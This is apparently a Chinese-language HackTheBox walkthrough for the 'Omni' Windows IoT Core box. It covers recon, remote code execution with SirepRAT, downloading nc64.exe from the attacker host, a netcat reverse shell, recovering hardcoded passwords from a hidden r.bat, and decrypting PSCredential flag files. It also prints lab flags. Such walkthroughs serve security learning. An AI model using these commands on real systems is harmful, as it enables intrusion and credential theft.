Recon

Nmap的结果显示,其开放了8080端口,但要求进行身份验证才可访问。其中Basic realm给的结果为Windows Device Portal,这和以往常见的8080不太一样,所以上网查了一查。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
# Nmap 7.80 scan initiated Sun Sep  6 19:07:02 2020 as: nmap -p- -sC -sV -oN nmap/initial 10.10.10.204
Nmap scan report for 10.10.10.204
Host is up (0.075s latency).
Not shown: 65529 filtered ports
PORT      STATE SERVICE  VERSION
135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.80%I=7%D=9/6%Time=5F54C3C4%P=x86_64-pc-linux-gnu%r(NU
SF:LL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,"\
SF:*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x04
SF:G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc
SF:9}\xc8O\x12");
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep  6 19:12:12 2020 -- 1 IP address (1 host up) scanned in 310.26 seconds

其他端口比较就比较常规,5985为winrm,135是Windows RPC

在谷歌搜索一番,查阅了官方文档后,发现以下信息。可以明确这是一台IoT设备什么是IoT,难怪官方贴出的system类型为其他。

Device family On by default? HTTP HTTPS USB
IoT Yes, in Dev Mode 8080 Enable via regkey N/A

Get-Shell

RCE

作为一台难度很低的机器,第一件事情当然是去找PoC啦。结果发现一篇文章,这篇文章中提到:

The researcher said the security issue he discovered allows an attacker to run commands with SYSTEM privileges on Windows IoT Core devices.

文章中同时还提到了这个项目已经开源SirepRAT。既然可以RCE,就不妨clone到本地来试试。

最终试验后结果证实,我们已经可以远程执行代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌─[matt@parrot]─[~/Documents/HTB/Boxes/Omni/SirepRAT]
└──╼ $python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c dir C:\\" --v
---------
 Volume in drive C is MainOS
 Volume Serial Number is 3C37-C677

 Directory of C:\

07/20/2020  02:36 AM    <DIR>          $Reconfig$
10/26/2018  11:35 PM    <JUNCTION>     Data [\??\Volume{ac55f613-7018-45c7-b1e9-7ddda60262fd}\]
10/26/2018  11:37 PM    <DIR>          Program Files
10/26/2018  11:38 PM    <DIR>          PROGRAMS
10/26/2018  11:37 PM    <DIR>          SystemData
10/26/2018  11:37 PM    <DIR>          Users
07/03/2020  10:35 PM    <DIR>          Windows
               0 File(s)              0 bytes
               7 Dir(s)     577,126,400 bytes free

---------
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<OutputStreamResult | type: 11, payload length: 584, payload peek: ' Volume in drive C is MainOS Volume Serial Numbe'>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: ''>

Reverse Shell

当然,事情没有这么简单,由于其操作系统不是常规的Windows,所以很多常用的PowerShell指令都没法使用,包括msfvenom生成的恶意木马在内。

这里我使用的方式是上传了一个64位的netcat,使用netcat获得的reverse shell

具体操作方法如下

1
2
3
4
5
6
7
8
9
┌─[matt@parrot]─[~/Documents/HTB/Boxes/Omni/SirepRAT]
└──╼ $cat ../command 
Invoke-WebRequest -Uri 10.10.16.5/nc64.exe -OutFile C:\\users\\Public\\nc64.exe
┌─[matt@parrot]─[~/Documents/HTB/Boxes/Omni/SirepRAT]
└──╼ $python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c powershell Invoke-WebRequest -Uri 10.10.16.5/nc64.exe -OutFile C:\\users\\Public\\nc64.exe" --v
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
┌─[matt@parrot]─[~/Documents/HTB/Boxes/Omni/SirepRAT]
└──╼ $python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\users\Public\nc64.exe" --args "10.10.16.5 1337 -e powershell.exe" --v
<HResultResult | type: 1, payload length: 4, HResult: 0x0>

获得shell以后查whoami等常见命令都无法使用,使用$env:username获得自己的用户名DefaultAccount。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
─[matt@parrot]─[~/Documents/HTB/Boxes/Omni]                                                                                                                                                                                     [14/14]
└──╼ $nc -nlvp 1337                                                                                                                                                                                                                     
Ncat: Version 7.80 ( https://nmap.org/ncat )                                                                                                                                                                                            
Ncat: Listening on :::1337                                                                                                                                                                                                              
Ncat: Listening on 0.0.0.0:1337                                                                                                                                                                                                         
Ncat: Connection from 10.10.10.204.                                                                                                                                                                                                     
Ncat: Connection from 10.10.10.204:49682.                                                                                                                                                                                               
Windows PowerShell                                                                                                                                                                                                                      
Copyright (C) Microsoft Corporation. All rights reserved.                                                                                                                                                                               
                                                                                                                                                                                                                                        
PS C:\windows\system32> $env:username
$env:username
DefaultAccount
PS C:\>

User && Root.txt

我们看到Users下没有任何用户,用户全存在Data下的User内,且常见的枚举工具包括winPEAS.exe也无法使用,尝试查找所有 bat vbs txt等常见的文件,发现可以的隐藏文件r.bat

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
PS C:\> gci Data\Users
gci Data\Users


    Directory: C:\Data\Users


Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
d-----         7/4/2020   9:48 PM                administrator                 
d-----         7/4/2020   9:53 PM                app                           
d-----         7/3/2020  11:22 PM                DefaultAccount                
d-----         7/3/2020  11:22 PM                DevToolsUser                  
d-r---         9/7/2020  10:17 AM                Public                        
d-----         7/4/2020  10:29 PM                System                        

PS C:\> get-childitem -path c:\ -filter *.bat -recurse -erroraction silentlycontinue -force
get-childitem -path c:\ -filter *.bat -recurse -erroraction silentlycontinue -force


    Directory: C:\Program Files\WindowsPowerShell\Modules\PackageManagement


Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
-a-h--        8/21/2020  12:56 PM            247 r.bat                         


    Directory: C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0


Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
-a----       10/26/2018  11:36 PM            744 Build.bat                     


    Directory: C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin


Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
-a----       10/26/2018  11:36 PM            925 Pester.bat                    


PS C:\>

在bat文件内发现app和administrator的密码,会想起我们需要登录的Web页面,使用改密码尝试登录成功。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
PS C:\Program Files\WindowsPowerShell\Modules\PackageManagement> type r.bat
type r.bat
@echo off

:LOOP

for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete

net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz

ping -n 3 127.0.0.1

cls

GOTO :LOOP

:EXIT

在Web上可以用登陆的用户身份执行命令,使用Administrator登录,结合之前上传的nc64.exe获得Shell,发现root.txt和常见的形式不同。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
PS C:\Data\users> cd Administrator
cd Administrator
PS C:\Data\users\Administrator> dir
dir


    Directory: C:\Data\users\Administrator


Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
d-r---         7/3/2020  11:23 PM                3D Objects                    
d-r---         7/3/2020  11:23 PM                Documents                     
d-r---         7/3/2020  11:23 PM                Downloads                     
d-----         7/3/2020  11:23 PM                Favorites                     
d-r---         7/3/2020  11:23 PM                Music                         
d-r---         7/3/2020  11:23 PM                Pictures                      
d-r---         7/3/2020  11:23 PM                Videos                        
-ar---         7/4/2020   9:48 PM           1958 root.txt                      


PS C:\Data\users\Administrator> type root.txt
type root.txt
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb0100000011d9a9af9398c648be30a7dd764d1f3a000000000200000000001066000000010000200000004f4016524600b3914d83c0f88322cbed77ed3e3477dfdc9df1a2a5822021439b000000000e8000000002000020000000dd198d09b343e3b6fcb9900b77eb64372126aea207594bbe5bb76bf6ac5b57f4500000002e94c4a2d8f0079b37b33a75c6ca83efadabe077816aa2221ff887feb2aa08500f3cf8d8c5b445ba2815c5e9424926fca73fb4462a6a706406e3fc0d148b798c71052fc82db4c4be29ca8f78f0233464400000008537cfaacb6f689ea353aa5b44592cd4963acbf5c2418c31a49bb5c0e76fcc3692adc330a85e8d8d856b62f35d8692437c2f1b40ebbf5971cd260f738dada1a7</SS>
    </Props>
  </Obj>
</Objs>
PS C:\Data\users\Administrator>

以前有用过PowerShell以别的用户执行命令的经验,参考这篇文章,其中说到

However, some cmdlet does not utilize the SecureString and require password in plain text. The SecureString object in this case will need to be decrypted into to plain text. If the account information has been constructed into a PSCredential object, the password could be extracted in plain text.

但是,某些cmdlet不使用SecureString,并且要求使用纯文本格式的密码。 在这种情况下,需要将SecureString对象解密为纯文本。 如果帐户信息已构建为PSCredential对象,则可以以纯文本形式提取密码。

我们看到已经将密码加密成了PSCredential,便可以看到明文密码。用文中提到的方法,我们就获得了root.txt。User.txt也是同理。

1
2
3
4
5
6
PS C:\Data\users\Administrator> $UserCred = Import-Clixml -Path root.txt
$UserCred = Import-Clixml -Path root.txt
PS C:\Data\users\Administrator> $UserCred.GetNetworkCredential().password
$UserCred.GetNetworkCredential().password
5dbdce5569e2c4708617c0ce6e9bf11d
PS C:\Data\users\Administrator>